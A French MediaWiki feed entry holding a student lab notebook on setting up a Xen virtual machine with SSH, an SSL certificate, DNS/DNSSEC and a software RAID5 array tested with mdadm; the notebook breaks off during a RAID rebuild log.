<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Hdelatte</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Hdelatte"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Hdelatte"/>
		<updated>2026-05-13T19:13:52Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46645</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46645"/>
				<updated>2017-12-14T17:52:02Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Mise en réseau et création de conteneurs sous Machine Virtuelle Linux */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Sécurisation et cryptage des données&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
       '''ssh root@cordouan.insecserv.deule.net'''&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
       '''xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie'''&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
       '''xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
[[Fichier:IMA5-BANANE.png]]&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
       xl list&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# xl list'''&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
       '''xl console IMA5-BANANE'''&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
    '''ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
    xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
    ssh username@weppes&lt;br /&gt;
    ssh root@193.48.57.179'''&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# vim /etc/ssh/sshd_config'''&lt;br /&gt;
       &lt;br /&gt;
    RSAAuthentication yes&lt;br /&gt;
    PubkeyAuthentication yes&lt;br /&gt;
    #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
    PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
    '''root@IMA5-BANANE:~# service ssh restart'''&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commençons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr'''&lt;br /&gt;
    Generating a 2048 bit RSA private key&lt;br /&gt;
    If you enter '.', the field will be left blank.&lt;br /&gt;
    -----&lt;br /&gt;
    Country Name (2 letter code) [AU]:FR&lt;br /&gt;
    State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
    Locality Name (eg, city) []:Lille&lt;br /&gt;
    Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
    Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
    Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
    Email Address []:&lt;br /&gt;
    A challenge password []:&lt;br /&gt;
    An optional company name []:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr'''&lt;br /&gt;
    -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
    &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
    -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# apt-get install postfix mailx'''&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
    root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs'''&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf''' &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# cat ports.conf''' &lt;br /&gt;
    Listen 80&lt;br /&gt;
    &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
    &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
    Listen 443&lt;br /&gt;
    &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
    root@IMA5-BANANE:/etc/apache2# service apache2 reload'''&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local'''&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.179&lt;br /&gt;
 www     IN      A       193.48.57.179&lt;br /&gt;
 @       IN      A       193.48.57.179&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf'''&lt;br /&gt;
    search banane.space&lt;br /&gt;
    nameserver 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
    root@IMA5-BANANE: dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space'''&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/etc/bind/banane.space.dnssec# ls'''&lt;br /&gt;
&lt;br /&gt;
    banane.space-ksk.key	  banane.space-zsk.key	    dsset-banane.space.&lt;br /&gt;
    banane.space-ksk.private  banane.space-zsk.private&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE: dnssec-signzone -o banane.space -k banane.space-ksk ../db.banane.space banane.space-zsk'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1. On vérifie que le DNSSEC est bien mis en place.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:DNSSEC.png]]&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
Nous créons trois nouvelles partitions qui vont représenter nos disques.&lt;br /&gt;
&lt;br /&gt;
       '''vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v'''&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ces partitions dans la machine virtuelle via le fichier IMA5-BANANE.conf&lt;br /&gt;
&lt;br /&gt;
       '''root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg'''&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On installe mdadm dans notre MV&lt;br /&gt;
&lt;br /&gt;
    '''apt-get install mdadm'''&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    '''mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf'''&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
    root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
    root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
    root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/'''&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
&lt;br /&gt;
    '''/dev/md0 /datamd0'''&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:/datamd0# vim raid5test.txt'''&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine. On constaste que la premiere partition a été &amp;quot;removed&amp;quot;:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --detail /dev/md0'''&lt;br /&gt;
  /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# ls /datamd0/'''&lt;br /&gt;
    raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour remettre la partition dans le raid5 il faut taper la commande suivante&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
    root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
    '''root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd'''&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 '''root@IMA5-BANANE:~# cat /proc/mdstat'''&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
